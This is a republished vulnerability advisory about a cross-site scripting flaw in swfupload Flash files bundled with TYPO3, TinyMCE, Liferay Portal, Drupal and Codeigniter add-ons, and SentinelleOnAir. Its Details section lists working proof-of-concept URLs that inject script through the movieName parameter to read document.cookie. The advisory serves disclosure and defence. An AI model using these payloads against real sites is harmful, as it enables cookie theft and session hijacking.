TYPO3 CMS, TinyMCE, Liferay Portal, Drupal swfupload XSS

2012-11-25 / 2013-07-20
Credit: MustLive
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I will draw your attention to XSS vulnerability in other web applications with swfupload. This is finial advisory concerning different versions of this flash application. Earlier I've wrote about swfupload in Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available in many other web applications. In previous letters I've wrote concerning web applications with swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash Player 8, 9 and 10). And now I'll write about web applications with swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and 11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir - among multiple web applications which are bundled with swfupload_f10.swf or swfupload_f11.swf. ------------------------- Affected products: ------------------------- Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir. There is no information that they have fixed this vulnerability in their software (at that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012). The developers of WordPress released new version of flash file (the same did the developers of XenForo), which could be used by all web developers, which were using swfupload. ---------- Details: ---------- XSS (WASC-08): SwfUploadPanel for TYPO3 CMS: http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Archiv plugin for TinyMCE: http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described earlier swfupload_f9.swf and swfupload_f8.swf. Liferay Portal: http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Liferay Portal also contains swfupload_f10.swf, besides described earlier swfupload_f9.swf and swfupload_f8.swf. Swfupload for Drupal: As it can be seen from the project http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload for Drupal. But exactly in this project there are no files. But they are in the project Respectiva (http://code.google.com/p/respectiva/), which is Drupal with Swfupload. http://site/js/libs/swfupload_f10.swf SWFUpload for Codeigniter: http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then in Google's index there is only one project - SentinelleOnAir, which contains swfupload_f11.swf. SentinelleOnAir: http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://websecurity.com.ua


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top